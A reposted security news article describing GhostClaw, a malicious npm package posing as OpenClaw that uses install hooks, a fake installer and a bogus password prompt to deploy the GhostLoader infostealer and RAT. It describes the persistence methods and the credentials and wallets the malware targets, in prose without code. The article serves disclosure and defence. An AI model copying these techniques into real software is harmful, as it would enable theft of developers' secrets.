By rssfeeds-admin 
In reality, it delivers a powerful malware framework that steals developer secrets, browser data, crypto wallet files, and system credentials, then installs a persistent remote access tool for long-term control.
The package looks harmless at first. Its metadata and source files present it as a normal utility, but the real malicious logic is hidden in setup and post-install scripts.
One of the first warning signs is a postinstall hook that silently installs the package globally. This places the fake openclaw command on the system path and ensures the malware runs even if the user only installs the package once.
Fake Installer, Real Credential Theft
The first-stage script is heavily obfuscated and launches a polished fake installer in the terminal.
It shows progress bars, spinners, and realistic setup messages to convince the victim that a genuine installation is underway.
After the fake setup completes, the script displays a bogus Keychain authorization prompt asking for the user’s system password.
The password request is the core of the attack. The malware validates entered passwords against the real operating system, so failed attempts behave exactly like normal authentication errors.
If the user enters the correct password, the malware gains access to protected data that would otherwise be harder to steal.
At the same time, the script quietly contacts a remote server, downloads an AES-256-GCM-encrypted second-stage payload, decrypts it, writes it to a temporary file, and launches it as a detached background process.
The stolen password is passed through environment variables. On macOS, the malware may also ask the user to grant Full Disk Access to Terminal, which allows it to access sensitive data such as Safari history, Apple Notes, Mail, and iMessage history.
Persistent RAT Targets Developers
The second-stage payload, internally called GhostLoader, is a large JavaScript malware bundle that acts as both an infostealer and a remote access trojan.
It installs itself in a hidden directory disguised as .npm_telemetry, adds shell hooks to startup files, and on Linux also creates a cron job for reboot persistence.
GhostLoader steals a wide range of data jfrog collects SSH keys, AWS credentials, Azure and GCP profiles, Kubernetes configs, Docker settings, Git credentials, GitHub CLI tokens, npm data, Solana keys, browser passwords, cookies, autofill records, crypto wallet files, and seed phrases.
It also targets AI tool configurations, including files related to OpenClaw-like environments.
The malware then compresses the stolen data and sends it to attacker-controlled servers and Telegram channels.
After installation, it enters persistent mode and can execute commands, open URLs, start a SOCKS5 proxy, re-collect files, update itself, or clone a live browser session using the Chrome DevTools Protocol.
This case shows how software supply chain attacks are evolving. For developers, the lesson is clear: treat any npm package that requests system credentials, runs hidden install scripts, or downloads remote payloads as highly suspicious.
Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google.
The post GhostClaw Poses As OpenClaw To Steal Sensitive Developer Data appeared first on Cyber Security News.
Discover more from RSS Feeds Cloud
Subscribe to get the latest posts sent to your email.